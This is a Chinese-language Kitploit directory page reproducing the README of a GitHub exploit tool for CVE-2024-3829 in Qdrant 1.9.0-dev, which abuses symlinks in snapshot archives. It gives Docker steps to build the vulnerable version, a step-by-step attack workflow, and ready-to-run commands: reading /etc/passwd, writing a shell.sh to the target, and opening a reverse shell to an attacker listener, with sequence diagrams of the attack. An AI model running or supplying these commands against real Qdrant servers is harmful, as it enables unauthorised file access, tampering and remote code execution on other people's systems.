Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-3829 — CVE-2024-3829 | Kitploit
工具/GitHubGitHub/fabse-hack/cve-2024-3829
漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试Payload 开发
GitHubfabse-hack/cve-2024-3829

CVE-2024-3829

CVE-2024-3829

查看仓库
11个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-3829 for Qdrant - 漏洞利用

root@kitploit:~
 ########################### 这是针对 QDRANT 1.9.0-dev 的 CVE-2024-3829 漏洞利用程序 ###########################  
 _______  __   __  _______         _______  _______  _______  _   ___         _______   _____   _______  _______   
|       ||  | |  ||       |       |       ||  _    ||       || | |   |       |       | |  _  | |       ||  _    |  
|       ||  |_|  ||    ___| ____  |____   || | |   ||____   || |_|   | ____  |___    | | |_| | |____   || | |   |  
|       ||       ||   |___ |____|  ____|  || | |   | ____|  ||       ||____|  ___|   ||   _   | ____|  || |_|   |  
|      _||       ||    ___|       | ______|| |_|   || ______||___    |       |___    ||  | |  || ______||___    |  
|     |_  |     | |   |___        | |_____ |       || |_____     |   |        ___|   ||  |_|  || |_____     |   |  
|_______|  |___|  |_______|       |_______||_______||_______|    |___|       |_______||_______||_______|    |___|  
  
 ############################################### 作者:fabse-hack.de ###############################################  

本仓库记录并演示了 qdrant/qdrant (v1.9.0-dev) 中的 CVE-2024-3829 漏洞

  • NVD:https://nvd.nist.gov/vuln/detail/CVE-2024-3829
  • 更多信息及本仓库思路来源:
  • Huntr:https://huntr.com/bounties/abd9c906-75ee-4d84-b76d-ce1386401e08
  • incibe:https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2024-3584
  • GitHub:https://github.com/qdrant/qdrant/commit/15479a45ffa3b955485ae516696f7e933a8cce8a

支持与捐赠

Paypal:

Buy Me a Coffee:

概述

该漏洞允许通过符号链接/路径技巧操作快照归档文件。这可以实现两类影响,外加一个反向 Shell,哈哈:

  1. 文件读取
  2. 文件写入
  3. 执行反向 Shell

根据环境不同,文件写入原语可能升级为代码执行。

受影响软件(详见 NVD 链接)

  • 产品: Qdrant
  • 版本: 1.9.0-dev
  • 组件: 快照导入/导出

关于版本号的说明:

此版本已不再在万维网(有些人称之为“互联网”)上提供。
在 qdrant 仓库中,NVD Nist 报告指向了存在漏洞的 v1.9.0-dev 提交。
如果您想在 Docker 上安装此版本用于 CTF 或其他用途,请使用:

root@kitploit:~
git clone https://github.com/qdrant/qdrant.git
cd qdrant
git checkout 15479a45ffa3b955485ae516696f7e933a8cce8a^
docker build -t qdrant:1.9.0-dev-vuln .
docker run -p 6333:6333 qdrant:1.9.0-dev-vuln

工作流程(简化版)

  1. 创建集合(collection)
  2. 生成快照
  3. 在本地解包并修改快照
  4. 向归档文件中注入指向读/写目标的符号链接
  5. 上传修改后的快照
  6. 触发快照恢复
  7. 评估结果(读取文件内容 / 写入文件 / 执行反向 Shell)

仓库内容

  • cve_2024_3829.py - 用于读/写/触发工作流程的漏洞利用程序
  • requirements.txt - Python 依赖

先决条件

  • 推荐使用 Kali Linux 系统
  • Python 3.10+
  • 正在运行的 Qdrant 服务器(用于本地测试)
  • Python 包 requests

安装:

root@kitploit:~
python3 -m pip install -r requirements.txt

用法

显示所有选项:

root@kitploit:~
python3 cve_2024_3829.py -h

示例:

root@kitploit:~
# 读取模式
python3 cve_2024_3829.py -m read -tu http://target_ip -tp <target_port> -tpath /etc/ -tf passwd

# 写入模式
python3 cve_2024_3829.py -m write -tu http://target_ip -tp <target_port> -tpath /tmp/ -apath /tmp/ -af shell.sh

# 反向 Shell 模式
python3 cve_2024_3829.py -m reverse_shell -tu http://target_ip -tp <target_port> -ai <listener_ip> -ap <listener_port>

可用参数

  • -h, --help:显示 CLI 帮助
  • -m, --mode:可选值 read、write、reverse_shell(必填)
    目标参数:
  • -tu, --target_url:Qdrant 基础 URL(脚本中的默认值)
  • -tp, --target_port:目标 Qdrant 端口(默认:6333)
  • -tpath, --target_path:远程目标路径(默认:/etc/)

备注

  • 如果单独传递 --target_port,则 --target_url 应为不带尾部端口的基础 URL,因为脚本会构建 <url>:<target_port>/... 的 URL。
  • 在 read 模式下,脚本会组合 --target_path 和 --target_file_name(例如 /etc/ + passwd)。
  • 在 write 模式下,--attacker_path 应指向一个已存在的本地文件,--attacker_file_name 定义远程文件名。
  • 对于跨 Docker/WSL/主机边界的网络测试,在运行触发模式前,请先验证可达性(例如使用 netcat)。
root@kitploit:~
sequenceDiagram
    participant Attacker as 攻击者
    participant Exploit as 漏洞利用程序
    participant Target as 目标
    participant Listener as 监听器

    Attacker->>Exploit: 启动漏洞利用脚本
    Exploit->>Listener: 启动 TCP 监听器
    Exploit->>Target: 创建恶意集合
    Exploit->>Target: 上传触发脚本
    Exploit->>Target: 覆盖可执行文件
    Exploit->>Target: 调用 /stacktrace 端点
    Target->>Listener: 反向 Shell 连接
    Listener->>Attacker: 交互式 Shell 访问
root@kitploit:~
flowchart TD
    Start[启动监听器]
    Bind[绑定到攻击者端口]
    Listen[等待连接]
    Accept[接受传入连接]
    Interactive[交互式 Shell 会话]
    End[连接关闭]

    Start --> Bind
    Bind --> Listen
    Listen --> Accept
    Accept --> Interactive
    Interactive --> End
下载工具
  • -tf, --target_file_name:远程目标文件名(默认:passwd)
    攻击者参数:
  • -ai, --attacker_ip:反向 Shell 模式的回调/监听 IP
  • -ap, --attacker_port:回调/监听端口(默认:9001)
  • -apath, --attacker_path:写入模式下本地攻击者文件路径(默认:/tmp/)
  • -af, --attacker_file_name:写入模式下在目标上使用的文件名(默认:shell.sh)